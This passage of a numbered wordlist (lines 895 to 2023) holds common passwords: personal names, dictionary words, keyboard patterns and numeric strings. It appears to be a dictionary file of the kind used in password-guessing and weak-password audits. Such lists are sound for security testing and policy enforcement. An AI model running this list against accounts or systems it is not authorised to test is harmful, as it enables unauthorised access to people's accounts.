895 | loveme
896 | lover
897 | loveyou
898 | lucas
899 | lucky
900 | lucy
901 | lulu
902 | lynn
903 | mac
904 | macha
905 | macintos
906 | maddock
907 | maddog
908 | madison
909 | maggie
910 | magic
911 | magnum
912 | mailer
913 | mailman
914 | major
915 | majordom
916 | malcolm
917 | malibu
918 | mantra
919 | marc
920 | marcel
921 | marcus
922 | margaret
923 | maria
924 | mariah
925 | marie
926 | marilyn
927 | marina
928 | marine
929 | marino
930 | mario
931 | mariposa
932 | mark
933 | market
934 | marlboro
935 | marley
936 | mars
937 | marshal
938 | martha
939 | martin
940 | marty
941 | marvin
942 | mary
943 | maryjane
944 | master
945 | masters
946 | math
947 | matrix
948 | matt
949 | matthew
950 | maurice
951 | maveric
952 | maverick
953 | max
954 | maxime
955 | maxwell
956 | mazda
957 | mayday
958 | me
959 | medical
960 | megan
961 | melanie
962 | melissa
963 | memory
964 | memphis
965 | meow
966 | mercedes
967 | mercury
968 | merlin
969 | metal
970 | metallic
971 | mexico
972 | michael
973 | michel
974 | michele
975 | michell
976 | michelle
977 | mickey
978 | micro
979 | midnight
980 | midori
981 | mikael
982 | mike
983 | mikey
984 | miki
985 | miles
986 | miller
987 | millie
988 | million
989 | mimi
990 | mindy
991 | mine
992 | minnie
993 | minou
994 | mirage
995 | miranda
996 | mirror
997 | misha
998 | mishka
999 | mission
1000 | missy
1001 | misty
1002 | mitch
1003 | mitchell
1004 | mittens
1005 | modem
1006 | molly
1007 | molson
1008 | mom
1009 | monday
1010 | monet
1011 | money
1012 | monica
1013 | monique
1014 | monkey
1015 | monopoly
1016 | monster
1017 | montana
1018 | montreal
1019 | moocow
1020 | mookie
1021 | moomoo
1022 | moon
1023 | moose
1024 | morgan
1025 | moroni
1026 | morris
1027 | mortimer
1028 | mother
1029 | mountain
1030 | mouse
1031 | mozart
1032 | muffin
1033 | murphy
1034 | music
1035 | mustang
1036 | nancy
1037 | naomi
1038 | napoleon
1039 | nascar
1040 | nat
1041 | natasha
1042 | nathan
1043 | nautica
1044 | ncc
1045 | ne
1046 | nebraska
1047 | nellie
1048 | nelson
1049 | nemesis
1050 | nesbitt
1051 | netware
1052 | network
1053 | new
1054 | newcourt
1055 | newpass
1056 | news
1057 | newton
1058 | newuser
1059 | newyork
1060 | nguyen
1061 | nicarao
1062 | nicholas
1063 | nick
1064 | nicole
1065 | niki
1066 | nikita
1067 | nimrod
1068 | niners
1069 | nirvana
1070 | nissan
1071 | nite
1072 | none
1073 | norman
1074 | nothing
1075 | notused
1076 | nss
1077 | nugget
1078 | number
1079 | nurse
1080 | oatmeal
1081 | obiwan
1082 | october
1083 | olive
1084 | oliver
1085 | olivia
1086 | olivier
1087 | one
1088 | online
1089 | open
1090 | opus
1091 | orange
1092 | oranges
1093 | orchid
1094 | orion
1095 | orlando
1096 | oscar
1097 | ou
1098 | oxford
1099 | pacers
1100 | pacific
1101 | packard
1102 | packer
1103 | packers
1104 | painter
1105 | paladin
1106 | pamela
1107 | panda
1108 | pandora
1109 | pantera
1110 | panther
1111 | papa
1112 | paris
1113 | parker
1114 | parrot
1115 | pascal
1116 | pass
1117 | passion
1118 | passwd
1119 | passwor
1120 | password
1121 | pat
1122 | patches
1123 | patricia
1124 | patrick
1125 | paul
1126 | paula
1127 | peace
1128 | peaches
1129 | peanut
1130 | pearl
1131 | pearljam
1132 | pebbles
1133 | pedro
1134 | peewee
1135 | peggy
1136 | penelope
1137 | penguin
1138 | penny
1139 | pentium
1140 | people
1141 | pepper
1142 | pepsi
1143 | percy
1144 | perry
1145 | pete
1146 | peter
1147 | petey
1148 | petunia
1149 | phantom
1150 | phil
1151 | philip
1152 | phillip
1153 | phish
1154 | phoenix
1155 | photo
1156 | piano
1157 | picard
1158 | picasso
1159 | pickle
1160 | picture
1161 | pierce
1162 | pierre
1163 | piglet
1164 | pinkfloy
1165 | pirate
1166 | pisces
1167 | pizza
1168 | planet
1169 | plato
1170 | play
1171 | playboy
1172 | player
1173 | players
1174 | please
1175 | pluto
1176 | pmc
1177 | poiuyt
1178 | polaris
1179 | police
1180 | politics
1181 | polo
1182 | pomme
1183 | poohbear
1184 | pookie
1185 | popcorn
1186 | popeye
1187 | porsche
1188 | porter
1189 | portland
1190 | power
1191 | ppp
1192 | praise
1193 | preston
1194 | prince
1195 | princess
1196 | prof
1197 | promethe
1198 | property
1199 | protel
1200 | psalms
1201 | psycho
1202 | public
1203 | puckett
1204 | pumpkin
1205 | punkin
1206 | puppies
1207 | puppy
1208 | puppy123
1209 | purple
1210 | pyramid
1211 | python
1212 | qazwsx
1213 | quality
1214 | quebec
1215 | quest
1216 | qwaszx
1217 | qwert
1218 | qwerty
1219 | rabbit
1220 | racerx
1221 | rachel
1222 | racing
1223 | racoon
1224 | radio
1225 | raider
1226 | raiders
1227 | rain
1228 | rainbow
1229 | raistlin
1230 | rambo
1231 | random
1232 | randy
1233 | ranger
1234 | raptor
1235 | raquel
1236 | rascal
1237 | rasta
1238 | raven
1239 | raymond
1240 | reader
1241 | reading
1242 | reality
1243 | rebecca
1244 | rebels
1245 | red
1246 | reddog
1247 | redrum
1248 | redskin
1249 | redwing
1250 | reebok
1251 | reefer
1252 | reggie
1253 | remember
1254 | renee
1255 | republic
1256 | research
1257 | retard
1258 | reynolds
1259 | reznor
1260 | rhonda
1261 | richard
1262 | ricky
1263 | ripper
1264 | river
1265 | robbie
1266 | robert
1267 | robin
1268 | robinhoo
1269 | robotech
1270 | rock
1271 | rocket
1272 | rocky
1273 | rodman
1274 | roger
1275 | roman
1276 | ronald
1277 | rooster
1278 | roping
1279 | rose
1280 | rosebud
1281 | roses
1282 | rosie
1283 | roxy
1284 | roy
1285 | royal
1286 | royals
1287 | ruby
1288 | rufus
1289 | rugby
1290 | runner
1291 | running
1292 | russel
1293 | russell
1294 | rusty
1295 | ruth
1296 | rux
1297 | ruy
1298 | ryan
1299 | sabrina
1300 | sadie
1301 | safety
1302 | sailing
1303 | sailor
1304 | sales
1305 | sally
1306 | salmon
1307 | salut
1308 | sam
1309 | samantha
1310 | sammie
1311 | sammy
1312 | sampler
1313 | sampson
1314 | samson
1315 | samuel
1316 | sanders
1317 | sandra
1318 | sandy
1319 | sango
1320 | santa
1321 | sapphire
1322 | sarah
1323 | sasha
1324 | saskia
1325 | sassy
1326 | saturn
1327 | savage
1328 | sbdc
1329 | scarlet
1330 | scarlett
1331 | school
1332 | science
1333 | scooby
1334 | scooter
1335 | scorpio
1336 | scorpion
1337 | scotch
1338 | scott
1339 | scotty
1340 | scout
1341 | scruffy
1342 | scuba
1343 | sean
1344 | seattle
1345 | secret
1346 | security
1347 | sendit
1348 | senior
1349 | septembe
1350 | sergei
1351 | service
1352 | seven
1353 | sexy
1354 | shadow
1355 | shadows
1356 | shalom
1357 | shannon
1358 | shanti
1359 | shark
1360 | sharon
1361 | shawn
1362 | sheba
1363 | sheena
1364 | sheila
1365 | shelby
1366 | shelley
1367 | shelly
1368 | sherry
1369 | shirley
1370 | shit
1371 | shithead
1372 | shoes
1373 | shooter
1374 | shorty
1375 | shotgun
1376 | sidney
1377 | sierra
1378 | silver
1379 | simba
1380 | simon
1381 | simple
1382 | singer
1383 | skater
1384 | skeeter
1385 | skidoo
1386 | skiing
1387 | skinny
1388 | skipper
1389 | skippy
1390 | slacker
1391 | slayer
1392 | smashing
1393 | smile
1394 | smiles
1395 | smiley
1396 | smiths
1397 | smokey
1398 | snake
1399 | snapple
1400 | snicker
1401 | snickers
1402 | sniper
1403 | snoopdog
1404 | snoopy
1405 | snow
1406 | snowbal
1407 | snowman
1408 | snuffy
1409 | soccer
1410 | softball
1411 | soleil
1412 | sonics
1413 | sonny
1414 | sophie
1415 | space
1416 | spain
1417 | spanish
1418 | spanky
1419 | sparky
1420 | sparrow
1421 | special
1422 | speech
1423 | speedo
1424 | speedy
1425 | spencer
1426 | spider
1427 | spike
1428 | spirit
1429 | spitfire
1430 | spooky
1431 | sports
1432 | spring
1433 | sprite
1434 | spunky
1435 | squirt
1436 | ssssss
1437 | stacey
1438 | stanley
1439 | star
1440 | stargate
1441 | start
1442 | startrek
1443 | starwars
1444 | station
1445 | stealth
1446 | steele
1447 | steelers
1448 | stella
1449 | steph
1450 | stephani
1451 | stephen
1452 | steve
1453 | steven
1454 | stever
1455 | stimpy
1456 | sting
1457 | stingray
1458 | stinky
1459 | storm
1460 | stormy
1461 | strat
1462 | strawber
1463 | strider
1464 | stuart
1465 | student
1466 | studly
1467 | stupid
1468 | success
1469 | sugar
1470 | summer
1471 | sun
1472 | sunbird
1473 | sundance
1474 | sunday
1475 | sunflowe
1476 | sunny
1477 | sunrise
1478 | sunset
1479 | sunshin
1480 | sunshine
1481 | super
1482 | superman
1483 | support
1484 | supra
1485 | surf
1486 | surfer
1487 | susan
1488 | suzanne
1489 | suzuki
1490 | sweetie
1491 | sweetpea
1492 | sweets
1493 | sweety
1494 | swimmer
1495 | swimming
1496 | sydney
1497 | sylvia
1498 | sylvie
1499 | symbol
1500 | system
1501 | t-bone
1502 | tacobell
1503 | taffy
1504 | tamara
1505 | tammy
1506 | tandy
1507 | tango
1508 | tanker
1509 | tanner
1510 | tanya
1511 | tara
1512 | tardis
1513 | target
1514 | tarzan
1515 | tasha
1516 | tattoo
1517 | taurus
1518 | taylor
1519 | tazman
1520 | teacher
1521 | teachers
1522 | tech
1523 | techno
1524 | teddy
1525 | telecom
1526 | temp
1527 | temporal
1528 | tennis
1529 | tequila
1530 | teresa
1531 | terry
1532 | test
1533 | test123
1534 | tester
1535 | testing
1536 | testtest
1537 | texas
1538 | theatre
1539 | theboss
1540 | theking
1541 | theman
1542 | theresa
1543 | thomas
1544 | thumper
1545 | thunder
1546 | thunderb
1547 | thursday
1548 | thx
1549 | tiffany
1550 | tiger
1551 | tigers
1552 | tigger
1553 | tigre
1554 | tim
1555 | timber
1556 | time
1557 | timothy
1558 | tina
1559 | tinker
1560 | tinman
1561 | tintin
1562 | toby
1563 | today
1564 | tom
1565 | tomcat
1566 | tommy
1567 | tony
1568 | tootsie
1569 | topcat
1570 | topgun
1571 | topher
1572 | toronto
1573 | toyota
1574 | tractor
1575 | tracy
1576 | training
1577 | travel
1578 | travis
1579 | trebor
1580 | trek
1581 | trevor
1582 | tricia
1583 | trident
1584 | tristan
1585 | trixie
1586 | trouble
1587 | truck
1588 | trucks
1589 | trumpet
1590 | tucker
1591 | tuesday
1592 | turbo
1593 | turtle
1594 | tweety
1595 | twins
1596 | tyler
1597 | undead
1598 | unicorn
1599 | user1
1600 | utopia
1601 | vader
1602 | valentin
1603 | valerie
1604 | valhalla
1605 | vampire
1606 | vanessa
1607 | vanilla
1608 | velvet
1609 | venus
1610 | vermont
1611 | veronica
1612 | vette
1613 | vicky
1614 | victor
1615 | victoria
1616 | victory
1617 | video
1618 | viking
1619 | vikings
1620 | vincent
1621 | violet
1622 | viper
1623 | virginia
1624 | visa
1625 | vision
1626 | volley
1627 | volleyb
1628 | volvo
1629 | voodoo
1630 | voyager
1631 | walker
1632 | walleye
1633 | wally
1634 | walter
1635 | wanker
1636 | warcraft
1637 | warez
1638 | warner
1639 | warren
1640 | warrior
1641 | warriors
1642 | water
1643 | watson
1644 | wayne
1645 | weasel
1646 | webmaste
1647 | webster
1648 | weezer
1649 | welcome
1650 | wendy
1651 | wesley
1652 | western
1653 | whales
1654 | whateve
1655 | whatever
1656 | wheeling
1657 | wheels
1658 | whisky
1659 | white
1660 | whitney
1661 | wicked
1662 | wilbur
1663 | wildcat
1664 | william
1665 | williams
1666 | willie
1667 | willow
1668 | willy
1669 | wilson
1670 | win95
1671 | win98
1672 | win2000
1673 | win2k
1674 | windows
1675 | windsurf
1676 | winner
1677 | winnie
1678 | winnt
1679 | winston
1680 | winter
1681 | wisdom
1682 | wizard
1683 | wolf
1684 | wolfgang
1685 | wolfman
1686 | wolverin
1687 | wolves
1688 | wombat
1689 | wonder
1690 | woodland
1691 | woody
1692 | wqsb
1693 | wrangler
1694 | wrestle
1695 | wright
1696 | wwwwww
1697 | xanadu
1698 | xavier
1699 | xcountry
1700 | xfiles
1701 | xxx
1702 | xxxx
1703 | xxxxxx
1704 | yamaha
1705 | yankees
1706 | yellow
1707 | yoda
1708 | yomama
1709 | young
1710 | yvonne
1711 | zachary
1712 | zapata
1713 | zaphod
1714 | zebra
1715 | zenith
1716 | zephyr
1717 | zeppelin
1718 | zeus
1719 | zhongguo
1720 | ziggy
1721 | zombie
1722 | zorro
1723 | zxcvb
1724 | zxcvbnm
1725 | zzzzzz
1726 | computer
1727 | cpu
1728 | memory
1729 | disk
1730 | soft
1731 | y2k
1732 | software
1733 | cdrom
1734 | rom
1735 | admin
1736 | master
1737 | card
1738 | pci
1739 | lock
1740 | ascii
1741 | knight
1742 | creative
1743 | modem
1744 | internet
1745 | intranet
1746 | web
1747 | www
1748 | isp
1749 | unlock
1750 | ftp
1751 | telnet
1752 | ibm
1753 | intel
1754 | microsoft
1755 | dell
1756 | compaq
1757 | toshiba
1758 | acer
1759 | info
1760 | aol
1761 | 56k
1762 | server
1763 | dos
1764 | windows
1765 | win95
1766 | win98
1767 | office
1768 | word
1769 | excel
1770 | access
1771 | unix
1772 | linux
1773 | password
1774 | file
1775 | program
1776 | mp3
1777 | mpeg
1778 | jpeg
1779 | gif
1780 | bmp
1781 | billgates
1782 | chip
1783 | silicon
1784 | sony
1785 | link
1786 | word97
1787 | office97
1788 | network
1789 | ram
1790 | sun
1791 | yahoo
1792 | excite
1793 | hotmail
1794 | yeah
1795 | sina
1796 | pcweek
1797 | mac
1798 | apple
1799 | robot
1800 | key
1801 | monitor
1802 | win2000
1803 | office2000
1804 | word2000
1805 | net
1806 | virus
1807 | company
1808 | tech
1809 | technology
1810 | print
1811 | coolweb
1812 | guest
1813 | printer
1814 | superman
1815 | hotpage
1816 | enter
1817 | myweb
1818 | download
1819 | cool
1820 | coolman
1821 | coolboy
1822 | coolgirl
1823 | netboy
1824 | netgirl
1825 | log
1826 | login
1827 | connect
1828 | email
1829 | hyperlink
1830 | url
1831 | hotweb
1832 | java
1833 | cgi
1834 | html
1835 | htm
1836 | home
1837 | homepage
1838 | icq
1839 | mykey
1840 | c++
1841 | basic
1842 | delphi
1843 | pascal
1844 | anonymous
1845 | crack
1846 | hack
1847 | hacker
1848 | chinese
1849 | vcd
1850 | chat
1851 | chatroom
1852 | mud
1853 | cracker
1854 | happy
1855 | hello
1856 | room
1857 | english
1858 | user
1859 | netizen
1860 | frontpage
1861 | agp
1862 | netwolf
1863 | usa
1864 | hot
1865 | site
1866 | address
1867 | mail
1868 | news
1869 | topcool
1870 | 000
1871 | 0000
1872 | 001
1873 | 002
1874 | 007
1875 | 008
1876 | 10th
1877 | 1st
1878 | 2nd
1879 | 3rd
1880 | 4th
1881 | 5th
1882 | 6th
1883 | 7th
1884 | 8th
1885 | 9th
1886 | 100
1887 | 101
1888 | 108
1889 | 133
1890 | 163
1891 | 166
1892 | 188
1893 | 233
1894 | 266
1895 | 350
1896 | 366
1897 | 450
1898 | 466
1899 | 136
1900 | 137
1901 | 138
1902 | 139
1903 | 158
1904 | 168
1905 | 169
1906 | 192
1907 | 198
1908 | 200
1909 | 222
1910 | 233
1911 | 234
1912 | 258
1913 | 288
1914 | 300
1915 | 301
1916 | 333
1917 | 345
1918 | 388
1919 | 400
1920 | 433
1921 | 456
1922 | 458
1923 | 500
1924 | 555
1925 | 558
1926 | 588
1927 | 600
1928 | 666
1929 | 598
1930 | 668
1931 | 678
1932 | 688
1933 | 888
1934 | 988
1935 | 999
1936 | 1088
1937 | 1100
1938 | 1188
1939 | 1234
1940 | 1288
1941 | 1388
1942 | 1588
1943 | 1688
1944 | 1888
1945 | 1949
1946 | 1959
1947 | 1960
1948 | 1961
1949 | 1962
1950 | 1963
1951 | 1964
1952 | 1965
1953 | 1966
1954 | 1967
1955 | 1968
1956 | 1969
1957 | 1970
1958 | 1971
1959 | 1972
1960 | 1973
1961 | 1974
1962 | 1975
1963 | 1976
1964 | 1977
1965 | 1978
1966 | 1979
1967 | 1980
1968 | 1981
1969 | 1982
1970 | 1983
1971 | 1984
1972 | 1985
1973 | 1986
1974 | 1987
1975 | 1988
1976 | 1989
1977 | 1990
1978 | 1997
1979 | 1999
1980 | 2000
1981 | 2001
1982 | 2002
1983 | 2088
1984 | 2100
1985 | 2188
1986 | 2345
1987 | 2588
1988 | 3000
1989 | 3721
1990 | 3888
1991 | 4567
1992 | 4728
1993 | 5555
1994 | 5678
1995 | 5888
1996 | 6666
1997 | 6688
1998 | 6789
1999 | 6888
2000 | 7788
2001 | 8888
2002 | 8899
2003 | 9988
2004 | 9999
2005 | 12345
2006 | 23456
2007 | 34567
2008 | 45678
2009 | 54321
2010 | 88888
2011 | 123456
2012 | 654321
2013 | 888888
2014 | 6666
2015 | 56789
2016 | 1234567
2017 | 12345678
2018 | 737
2019 | 777
2020 | 1111
2021 | 2222
2022 | 3333
2023 | 4321
--------------------------------------------------------------------------------